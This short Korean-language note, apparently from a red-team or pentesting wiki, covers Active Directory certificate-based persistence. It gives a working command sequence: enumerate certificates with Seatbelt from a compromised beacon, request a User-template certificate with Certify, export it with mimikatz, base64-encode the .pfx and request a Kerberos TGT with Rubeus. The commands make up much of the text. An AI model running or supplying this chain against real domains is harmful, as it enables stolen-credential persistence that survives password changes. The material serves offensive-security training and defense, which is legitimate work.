Certificate

인증서는 CA에 의해 폐기되거나 만료되지 않는 이상, 비밀번호를 변경한다고 하더라도 유효하게 사용이 가능하며 유효기간은 기본적으로 1년이기 때문에 지속성 공격으로 탁월합니다.

User Persistence

다른 사용자의 Personal Certificate Store에 저장된 인증서는 도메인/로컬 관리자라고 하더라도 열람할 수 없습니다. 인증서는 HKCU\Software\Microsoft\SystemCertificates 키 아래의 시스템 레지스트리에 보관되며 C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ 하위에 저장될 수도 있습니다.

대상 비콘을 획득한 단계에서 인증서를 열거하기 위해 Seatbelt를 사용할 수 있습니다. 이때 열거된 인증서 중 Client Authentication 용도로 설정된 인증서만이 인증서를 통해 사용자 인증이 가능합니다. 만약 사용자 저장소에 인증서가 없다면 내장된 기본 템플릿인 User 템플릿을 요청할 수 있습니다.

# Seatbelt를 사용한 사용자 인증서 열거
.\Seatbelt.exe Certificates

# 인증서가 없다면 내장된 User 템플릿 요청
.\Certify.exe request /ca:<ca> /template:User

# 인증서 추출
mimikatz crypto::certificates /export

# 인증서 다운로드
download <pfx file>

# 인증서 Base64 포맷으로 변경
cat user.pfx | base64 -w 0

# 인증서를 통한 TGT 요청(패스워드 : mimikatz)
.\Rubeus.exe asktgt /user:<USER> /certificate:<Base64 Encoded pfx> /password:mimikatz /nowrap

Computer Persistence

도메인 사용자 계정의 경우 해당 사용자만이 본인의 저장소에 접근이 가능한 반면, 머신 계정의 저장소는 로컬 관리자만이 접근할 수 있습니다.

References

Certificate Stores - Windows driversMicrosoftLearn